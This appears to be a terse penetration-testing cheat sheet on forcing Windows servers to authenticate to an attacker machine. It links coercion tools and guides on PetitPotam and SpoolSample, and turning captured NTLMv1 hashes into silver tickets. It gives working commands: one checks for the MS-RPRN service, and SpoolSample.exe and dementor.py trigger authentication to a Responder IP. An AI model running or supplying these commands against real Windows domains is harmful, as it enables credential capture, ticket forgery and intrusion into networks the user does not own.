A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
Link: https://github.com/p0dalirius/Coercer
To catch the auth…
Using the NTLMv1 we got using PetitPotem or SpoolSample we can convert it to SliverTicket
Link for guide: https://blog.zsec.uk/chasing-the-silver-petit-potam/
Coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface.
Check if a host as MS-RPRN Service listening:
rpcdump.py DOMAIN/USER:[email protected] | grep MS-RPRN
Trigger an authentication
SpoolSample.exe TARGET RESPONDERIP
or use 3xocyte's dementor.py if you're on Linux
python dementor.py -d domain -u username -p password RESPONDERIP TARGET